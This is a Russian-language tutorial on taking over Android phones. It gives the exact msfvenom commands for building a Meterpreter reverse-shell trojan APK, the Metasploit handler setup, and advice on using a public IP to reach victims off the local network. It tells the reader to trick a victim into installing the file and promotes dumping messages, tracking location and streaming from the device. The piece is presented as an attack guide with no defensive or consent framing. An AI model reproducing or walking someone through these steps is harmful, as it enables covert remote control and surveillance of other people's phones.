Не будет долгих отступлений, сразу скажу, что в этой статье будет рассмотрен взлом Android устройств. Погнали.
Что нам нужно?
1.
Терминал Kali Linux.
2.
Прямые ручки.
Начнем.
Для начала стоит объяснить суть атаки:
- Первым делом мы генерируем наш троян(по-другому пейлоад или полезная нагрузка)
- Второе. Мы запустим metasploit и запустим своеобразный "слушатель", с помощью которого мы подключимся к нашей полезной нагрузке(сгенерированному трояну).
- Третье. Жертва должна будет запустить наш .apk файл, только после его установки и запуска у нас вылезет сессия meterpreter.
Если вы не знаете, что такое meterpreter, то объясню простыми словами. Это своеобразная часть нашего трояна, дающая нам возможность управлять целью. Т.е при запуске сессии с помощью meterpreter мы сможем управлять нашей жертвой.
Первое. Генерируем payload. (полезную нагрузку, троян, называйте как хотите)
Собственно, запускаем терминал и пишем вот такую команду:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 R > hack.apk
Итак, давай разбираться, что это за зверь такой. Командой "msfvenom" мы показываем, что хотим сгенерировать полезную нагрузку.
После флажка "-p" у нас идёт вид полезной нагрузки. Он у нас называется "android/meterpreter/reverse_tcp".
Потом команда "LHOST", в нее мы вводим наш локальный ip'шник, который можно узнать через команду ifconfig. Ищите ваш локальный IP в строке wlan0.
Да-да, вы спросите, мол: "Получается, что мы можем взаимодействовать с нашим трояном только через локальную сеть?". Ответ, не совсем. Если вы вобьете ваш частный (локальный) IP, то, собственно, вы сможете использовать наш пейлоад(троян) только через общую WiFi сеть. Но как и всегда есть решение, а заключается оно в том, что вам просто нужно вбить вместо вашего локального IP, ваш публичный IP, который не сложно узнать на таких ресурсах как 2ip или whoer. Тогда наша команда будет выглядеть так:
msfvenom -p android/meterpreter/reverse_https LHOST=твой публичный IP LPORT=443 R > hack.apk
(Да-да, тут есть изменения, учитывайте их)
В поле "LPORT" вы прописываете порт для дальнейшего соединения, советую брать 4444. Потом идёт эта команда: "R > *путь до сохранения файла.apk*"
Второе. Подключаемся к нашей полезной нагрузке.
Итак, вводим в терминал команду msfconsole, она откроет вам metasploit.
Отлично! Вводим команду:
use exploit/multi/handler
Тут мы даём понять, что мы хотим включить наш "слушатель" для дальнейшей связи с трояном.
Теперь это:
set payload android/meterpreter/reverse_tcp
Здесь мы указываем вид нашей полезной нагрузки.
Пишем:
set LHOST *ваш частный ip*
Думаю, тут объяснять особо ничего не надо, НО если вы ввели в пейлоад ваш публичный IP, то сюда вы в ЛЮБОМ случае ставите локальный.
Затем пишем:
set LPORT *наш порт из пейлоад*
Отлично! Вводим команду exploit. Тут наш "слушатель" ждёт ответа от полезной нагрузки.
Осталось дело за малым, просто заставить жертву установить и открыть ваш файл, профит!
После того, как жертва сделала наши заветные действия, у нас должна вылезти сессия meterpreter.
Ее функции вы сможете узнать из команды "help". Да-да, дамп переписок, геолокация, стрим с устройства и это ещё не всё.
